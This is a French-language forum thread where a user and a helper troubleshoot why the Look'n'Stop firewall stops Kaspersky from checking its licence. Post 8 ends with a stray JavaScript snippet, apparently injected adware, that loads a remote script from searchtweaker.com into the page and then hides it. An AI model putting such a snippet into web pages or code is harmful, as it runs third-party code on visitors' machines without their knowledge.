LnS bloque Kaspersky !

Discussion in 'LnS French Forum' started by InVisibleMan, Oct 26, 2012.

Thread Status:
Not open for further replies.
  1. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    Bonjour à tous :)

    Voilà mon problème: tous les mois, mon anti virus Kaspersky (dernière version, la 12) essaye de se connecter aux serveurs de Kaspersky Lab pour vérifier la clé de licence. Et à chaque fois, ça échoue. Pour que ça marche, je dois quitter Look'n'Stop ... et ça ne me plait pas du tout :ninja:

    Quelqu'un pourrait t-il me donner une règle permettant à Kaspersky de se connecter sans que je doive quitter L'n'S svp ?

    Merci d'avance de votre aide :)
     
  2. Spiedbot

    Spiedbot Guest




    Salut,


    "et ça ne me plait pas du tout"

    Au contraire, tu devrais être content, à tous les coups c'est une connexion entrante, ou une connexion faisant suite à une mise à jour ou autre sans relation avec celle ci, tout bon pare feu refuse.
    Kaspersky n'a rien à faire dans tes fichiers perso.

    Si vraiment tu veux autoriser, regarde dans le journal ce qui est bloqué puis clic droit, mais attention si c'est une connexion entrante (de type serveur), tu ouvres une porte vers l'extérieur.
     
  3. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    C'est pas que je tienne particulièrement à autoriser cette connexion, c'est plutôt que je n'ai pas le choix !! Si je ne le laisse pas établir sa connexion, il me dit que la licence est périmée et refuse alors de faire les mises à jour des bases virales ! Ce qui ne l'empêche pas au passage de me dire aussi que mon abonnement est valable pendant encore 10 mois ... un peu contradictoire mais bon passons ... Donc je suis obligé de le laisser faire cette connexion avec les serveurs de Kaspersky Lab ! :eek:
    Avec les versions précédentes de Kasperky c'était bien plus simple: à l'achat du logiciel on nous envoyait un fichier de licence .key et basta, ça marchait pendant un an.
    Mais avec la version 12, l'anti virus doit se connecter tous les mois aux serveurs de Kaspersky Lab pour actualiser le fichier de licence ... J'ai bien réclamé au support qu'on m'envoit un fichier .key pour résoudre mon problème mais ils me répondent que ce n'est pas possible ... :shifty:
    Le truc bizarre c'est que j'ai une licence pour 2 postes, et je n'ai pas ce problème là avec l'autre ordi sur lequel tourne aussi Look'n'Stop. La seule différence c'est qu'il est sous Win XP x64 Pro et celui où se produit le bug est sur Win 7 x64 Pro.

    Bon ... merci pour ta réponse, dés que je suis à nouveau confronté au problème, je regarde dans le journal comme tu me dis puis clic droit pour autoriser c'est ça ?
    Je pense pas que ça soit un problème d'ouvrir comme ça la connexion vu que ça sera temporaire: je n'autoriserai QUE le temps que l'anti virus fasse son truc, puis je retirerai l'autorisation aussi sec. Ce que je veux éviter c'est de quitter complètement Look'n'Stop parce que là, TOUTES les connexions entrantes et sortantes peuvent se produire sauf si on compte sur le pare feu Windows mais, perso je compte pas sur lui :cautious:
     
  4. Lovesan

    Lovesan Registered Member

    Joined:
    Oct 30, 2012
    Posts:
    2
    Location:
    France
    pour memoire nous en sommes a la v2013, http://support.kaspersky.com/fr/kis2013?level=2
     
  5. Lovesan

    Lovesan Registered Member

    Joined:
    Oct 30, 2012
    Posts:
    2
    Location:
    France
    cela fait deja plusieurs annees que les licences Kaspersky Grand Public n'ont plus de cle de licence mais des codes activations

    effectivement ce n est plus possible, si tu veux une licence avec un fichier .KEY il faut t'orienter vers les offres entreprises genre KES8

     
  6. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    Ca y est c'est le grand jour, Kaspersky veut vérifier ma licence !
    Comme d'hab, ça marche pas "Impossible de se connecter".
    Le pare feu Windows est désactivé. J'ai regardé les règles de filtrage qui se sont activées dans le journal de L'n'S, et une à une, je les ai désactivées et rententé d'établir la connexion de Kaspersky, mais c'est impossible, Kespersky continue de me dire qu'il n'arrive pas à se connecter.
    Alors, j'ai carrément décoché la case "Filtrage Internet actif" dans L'n'S, je sais c'est dangereux mais c'est juste pour vérifier que Kaspersky arrive alors à se connecter mais ... il n'y arrive toujours pas !
    C'est ça qui est bizarre: même en désactivant complètement le filtrage internet de L'n'S, Kaspersky n'arrive toujours pas à établir sa connexion !
    Pour que ça marche, il faudrait que je QUITTE L'n'S ... bref j'ai toujours mon problème sur les bras ... :(
    Tu as une idée Spiedbot ?
     
  7. Spiedbot

    Spiedbot Guest

    Plutôt que de désactiver les règles une par une, il faut que tu ailles dans le journal pour voir quelle est la règle de filtrage qui bloque, c'est possible, mais je ne peux pas t'en dire plus en ce moment, je n'ai pas LNS sur mes PC.
     
  8. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    Le hic c'est que même quand je désactive toutes les règles, la connexion échoue encore ... C'est ça mon problème: c'est d'être obligé de quitter L'n'S temporairement pour pouvoir laisser Kaspersky interroger ses serveurs pour valider ma licence tous les mois ... :oops:
    (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
     
  9. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    Le hic c'est que même quand je désactive toutes les règles, la connexion échoue encore ... C'est ça mon problème: c'est d'être obligé de quitter L'n'S temporairement pour pouvoir laisser Kaspersky interroger ses serveurs pour valider ma licence tous les mois ... :oops:
     
  10. Spiedbot

    Spiedbot Guest

    Quelle est la règle bloquante?... cherche.
     
  11. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    Pour trouver la règle bloquante, il faudrait qu'en la désactivant la connexion réussisse. C'est ce que je fais: j'ai désactivé une à une toutes les règles bloquantes qui apparaissaient dans le journal sans résultat. Le problème est donc ailleurs je pense.
     
  12. Spiedbot

    Spiedbot Guest

    Une dernière fois...

    Juste au moment où Kaspersky s'est signalé, il y a eu un message dans le journal, interprète le par un clic sur celui ci, connecté ou pas c'est possible.
     
  13. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    OK: voilà une capture d'écran de mon journal L'n'S. Kaspersky a tenté de se connecter à 11h45 et 0s, et toutes les règles consignaient une entrée dans le journal:

    Journal_L'n'S.jpg
     
  14. Spiedbot

    Spiedbot Guest

    Tu n'as toujours pas fait ce que je t'ai demandé, en plus apparemment tu es chez Free en IPv6 (pourquoi faire?), et le journal ne me dit rien qui vaille (quel jeu de règles?), alors salut.
     
  15. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    :eek: Désolé si je ne comprends pas bien tout ce que tu me dis de faire ... Tu veux que je fasse un double clic sur quel entrée du journal ?
     
  16. Spiedbot

    Spiedbot Guest



    D'abord, vérifie dans la configuration de la freebox si le routeur est activé, ensuite, si IPv6 est activé désactive le, ça ne sert à rien pour l'instant et personne n'a exploré les problèmes à venir au niveau de la sécurité du réseau.

    Fais un clic droit sur la ligne ARP dans ton journal et fais "ouvrir la règle", qu'est ce que ça dit?


    Si tu n'as pas la version 2.07 de LNS mets à jour.

    Désactive le filtrage de protocoles pour voir (options avancées), si ça marche, jette un oeil là,

    https://www.wilderssecurity.com/showthread.php?t=276922
     
    Last edited by a moderator: Nov 13, 2012
  17. Spiedbot

    Spiedbot Guest

    D'après le journal, tu perds la connexion lorsque Kaspersky se met à jour, la freebox cherche à pinguer ton PC.

    Le problème ne vient pas de LNS, vérifie quand même que la version 2.07 est bien en place, que le jeu de règles évoluées est installé, et que le filtrage de protocoles n'est pas activé.


    Kaspersky antivirus a un module réseau, comme Avast, c'est inutile et ça peut entrer en conflit avec n'importe quel pare feu, essaye de le désactiver, c'est lui qui coupe.





    ps: je rechange de PC, plus de Look n' stop...
     
    Last edited by a moderator: Nov 14, 2012
  18. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    Merci Spiedbot,

    J'ai vérifié:
    _ Freebox en mode routeur: activé
    _ IPv6 n'est pas activé
    _ L'n'S: v2.07 avec Jeu de règles évolué sans filtrage de protocoles
    _ J'ai rajouté L'n'S comme application de confiance dans KAV et j'ai désactivé le module Réseau de KAV

    ... ça marche toujours pas: "impossible d'établir la connexion au serveur" ... o_O

    Maintenant, voilà ce que dit la ligne:

    Regle_ARP.jpg

    Merci de ton aide Spedbot
     
  19. Spiedbot

    Spiedbot Guest

    Là ça devient embêtant... vérifie que les autorisations pour KAV dans LNS n'ont pas de points rouges, essaye pour voir de désactiver le filtrage ICMP (décoche à gauche dans le filtrage internet), de désactiver le stateful packet inspection, en dernier ressort de réinstaller LNS avec le jeu de règles de base.

    Côté Windows, mets toi en mode "domicile bureau" et fais "résoudre les problèmes" en bas à droite sur la connexion, tu n'as pas d'alerte UAC lors de la mise à jour de KAV?


    Peut être que LNS bloque une connexion de KAV, mais apparemment on ne voit rien sur le journal, mets voir une plage plus large, 5' avant l'heure fatidique et 10' après, et poste la.
    La règle ARP est correcte.
     
  20. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    _ KAV: pas de point rouge dans L'n'S
    _ Règles de filtrage ICMP: toutes désactivées
    _ Fonction Stateful Packet Filter: inactif

    ... même résultat ... Réinstaller L'n'S je suis pas très chaud à priori parce que je vais perdre tous mes réglages non ? Je veux parler de toutes les autorisations/interdictions du filtrage logiciel.

    Après, côté Windows je sais pas comment me mettre en mode "domicile bureau".

    Voici le journal: j'ai fait la requête KAV à 11h 38mn 40s et toutes les règles actives sont consignées. Ce qui est bizarre c'est que des règles de type ICMP apparaissent alors que j'ai bien vérifié: elles sont inactives ... o_O

    Journal.jpg
     
  21. Spiedbot

    Spiedbot Guest

    Comprend pas! avant l'heure fatidique (maj KAV), ton PC ping la freebox, et la Freebox ne répond pas (pas de type 0 code 0), le problème est déjà là, tu as un problème réseau, et pas spécialement LNS.


    Dans l'écran Windows 7 tu as un carré en bas à droite (symbole d'un petit écran), clic droit et "résoudre les problèmes", puis ouvrir le "centre réseau et partage" pour mettre en "domicile bureau".


    Avant de réinstaller LNS il faut cocher "extra save", récupérer le lendemain le fichier .reg dans le dossier de LNS, fermer LNS (clic dans la croix en haut à droite), puis double clic sur le fichier .reg, rouvrir LNS, mais j'espère que les règles logiciels n'ont pas été bricolées, laisse à l'état brut, de même pour les règles internet.


    ICMP... quand tu fais quelque chose sur LNS, clic sur "appliquer" en bas, sinon ça ne marche pas, recommence.
     
    Last edited by a moderator: Nov 14, 2012
  22. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    OK là je suis au taf, je me penche sur tout ça dés que je peux, merci encore
     
  23. Spiedbot

    Spiedbot Guest

    Tu tenteras aussi de faire un clic droit sur la ligne de journal "+167 up ARP..." en autorisant en mode client et en limitant (en bas à gauche du cadre de la règle) à l'IP 192.168.0.12, la tienne, enfin j'espère.

    Clic sur "appliquer" ensuite...
     
  24. InVisibleMan

    InVisibleMan Registered Member

    Joined:
    Oct 26, 2012
    Posts:
    29
    Location:
    France
    OK j'ai ouvert le "centre réseau et partage", mais après je vois pas comment mettre le mode "domicile bureau" ?

    Screen.jpg
     
  25. Spiedbot

    Spiedbot Guest

    "mais après je vois pas comment mettre le mode "domicile bureau" ?"

    Clique sur "réseau public".


    Il y a quelque chose qui ne va pas, à droite de "réseau public", moi sur mes 2 PC W7 et W8 j'ai "connexion au réseau local", affiche l'intégralité du réseau pour voir, après avoir mis "domicile bureau".
     
    Last edited by a moderator: Nov 15, 2012
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.